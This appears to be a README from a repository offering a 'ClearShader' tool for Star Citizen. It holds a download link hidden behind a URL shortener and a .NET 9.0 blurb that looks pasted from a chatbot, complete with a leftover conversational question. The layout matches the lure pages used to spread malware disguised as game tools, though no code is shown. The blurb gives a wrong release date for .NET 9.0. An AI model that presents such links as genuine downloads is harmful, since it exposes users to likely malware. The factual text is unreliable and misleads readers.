DoxData/ClearShader-Star-Citizen/README.md

    #DOWNLOAD: https://nlink.at/Descargar_ClearShader_StarCitizen

      ATTENTION, the application is created with NET 9.0 from Microsoft and it is necessary to have NET 9.0 installed on your PC
+   NET 9.0 is a recent version of Microsoft's .NET development framework, released in February 2025.
+This framework is an open-source platform that allows you to develop applications for different operating systems such as Windows, macOS, and Linux.
+Some of the notable features of .NET 9.0 include:

+Performance improvements: Aspects such as garbage collection and code generation have been optimized for faster and more efficient applications.

+Support for cloud-native applications: .NET 9.0 is designed to make it easier to develop modern applications that take full advantage of cloud environments.

+New library features: For example, improvements in System.Text.Json to work with JSON and new functionalities in LINQ.

+Support for updated languages: Support for C# 13.0, F# 9.0, and Visual Basic 17.13.

+You can find more details about this version in the official documentation.
+Are you thinking of using it for a project? 😊
                 Download.NET 9.0: https://dotnet.microsoft.com/es-es/download/dotnet/9.0